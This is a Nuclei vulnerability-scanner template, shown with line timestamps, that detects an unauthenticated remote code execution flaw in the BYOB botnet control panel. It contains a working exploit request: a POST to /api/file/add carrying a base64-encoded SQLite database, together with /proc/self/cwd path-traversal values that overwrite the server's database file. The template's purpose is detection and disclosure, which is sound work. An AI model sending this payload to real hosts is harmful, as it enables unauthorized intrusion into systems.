2024-08-17 09:58:02 +00:00
|
|
|
id: malwared-byob-rce
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Malwared BYOB - Unauthenticated Remote Code Execution
|
|
|
|
author: pdteam
|
|
|
|
severity: critical
|
|
|
|
description: |
|
|
|
|
Malwared BYOB - Unauthenticated RCE allows remote code execution.
|
|
|
|
impact: |
|
|
|
|
Potential unauthorized access and control of the target system by threat actors.
|
|
|
|
remediation: |
|
|
|
|
Remove any instances of the Malwared - Build Your Own Botnet tool from the target system and conduct a thorough security audit.
|
2024-08-27 04:13:30 +00:00
|
|
|
reference:
|
|
|
|
- https://blog.chebuya.com/posts/unauthenticated-remote-command-execution-on-byob/
|
|
|
|
- https://github.com/chebuya/exploits/tree/main/BYOB-RCE
|
|
|
|
- https://github.com/malwaredllc/byob
|
2024-08-17 09:58:31 +00:00
|
|
|
metadata:
|
2024-08-27 04:13:30 +00:00
|
|
|
verified: true
|
|
|
|
max-request: 7
|
2024-08-17 09:58:31 +00:00
|
|
|
shodan-query: http.favicon.hash:487145192
|
|
|
|
fofa-query: icon_hash="487145192"
|
2024-08-17 09:58:02 +00:00
|
|
|
tags: rce,malware,byob,botnet,oss
|
|
|
|
|
|
|
|
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}"
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "Build Your Own Botnet"
|
|
|
|
- "Post-Exploitation Framework"
|
|
|
|
- "malwaredllc/byob"
|
|
|
|
internal: true
|
|
|
|
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /api/file/add HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
data=U1FMaXRlIGZvcm1hdCAzABAAAQEAQCAgAAAADAAAAAsAAAAAAAAAAAAAAAUAAAAEAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAC52iQ0P%2BAAKCD4ADvYPzwyRDscLJQxiCYgK5Ag%2BCV8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIIeCQcXFRUBhB90YWJsZXRhc2t0YXNrCkNSRUFURSBUQUJMRSB0YXNrICgKCWlkIElOVEVHRVIgTk9UIE5VTEwsIAoJdWlkIFZBUkNIQVIoMzIpIE5PVCBOVUxMLCAKCXRhc2sgVEVYVCwgCglyZXN1bHQgVEVYVCwgCglpc3N1ZWQgREFURVRJTUUgTk9UIE5VTEwsIAoJY29tcGxldGVkIERBVEVUSU1FLCAKCXNlc3Npb24gVkFSQ0hBUigzMikgTk9UIE5VTEwsIAoJUFJJTUFSWSBLRVkgKGlkKSwgCglVTklRVUUgKHVpZCksIAoJRk9SRUlHTiBLRVkoc2Vzc2lvbikgUkVGRVJFTkNFUyBzZXNzaW9uICh1aWQpCiknCgYXOxUBAGluZGV4c3FsaXRlX2F1dG9pbmRleF90YXNrXzF0YXNrC4JZBwcXLS0BhGV0YWJsZWV4ZmlsdHJhdGVkX2ZpbGVleGZpbHRyYXRlZF9maWxlCENSRUFURSBUQUJMRSBleGZpbHRyYXRlZF9maWxlICgKCWlkIElOVEVHRVIgTk9UIE5VTEwsIAoJZmlsZW5hbWUgVkFSQ0hBUigzNCkgTk9UIE5VTEwsIAoJc2Vzc2lvbiBWQVJDSEFSKDE1KSBOT1QgTlVMTCwgCgltb2R1bGUgVkFSQ0hBUigxNSkgTk9UIE5VTEwsIAoJY3JlYXRlZCBEQVRFVElNRSBOT1QgTlVMTCwgCglvd25lciBWQVJDSEFSKDEyMCkgTk9UIE5VTEwsIAoJUFJJTUFSWSBLRVkgKGlkKSwgCglVTklRVUUgKGZpbGVuYW1lKSwgCglGT1JFSUdOIEtFWShvd25lcikgUkVGRVJFTkNFUyB1c2VyICh1c2VybmFtZSkKKT8IBhdTLQEAaW5kZXhzcWxpdGVfYXV0b2luZGV4X2V4ZmlsdHJhdGVkX2ZpbGVfMWV4ZmlsdHJhdGVkX2ZpbGUJgjoFBxcbGwGES3RhYmxlcGF5bG9hZHBheWxvYWQGQ1JFQVRFIFRBQkxFIHBheWxvYWQgKAoJaWQgSU5URUdFUiBOT1QgTlVMTCwgCglmaWxlbmFtZSBWQVJDSEFSKDM0KSBOT1QgTlVMTCwgCglvcGVyYXRpbmdfc3lzdGVtIFZBUkNIQVIoMyksIAoJYXJjaGl0ZWN0dXJlIFZBUkNIQVIoMTQpLCAKCWNyZWF0ZWQgREFURVRJTUUgTk9UIE5VTEwsIAoJb3duZXIgVk
|
|
|
|
|
|
|
|
payloads:
|
|
|
|
db_path:
|
|
|
|
- /proc/self/cwd/buildyourownbotnet/database.db
|
|
|
|
- /proc/self/cwd/../buildyourownbotnet/database.db
|
|
|
|
- /proc/self/cwd/../../../../buildyourownbotnet/database.db
|
|
|
|
- /proc/self/cwd/instance/database.db
|
|
|
|
- /proc/self/cwd/../../../../instance/database.db
|
|
|
|
- /proc/self/cwd/../instance/database.db
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2024-08-27 04:13:30 +00:00
|
|
|
- "buildyourownbotnet/database.db"
|
2024-08-27 04:41:56 +00:00
|
|
|
# digest: 490a0046304402201273e8c79b6c6ee800aef79e70551f99097ad44f4b7e521efc509b04fd9d431c02206bffadd496403236e17956f53119014326ef1bf32030095b0feeec21774545bd:922c64590222798bb761d5b6d8e72950
|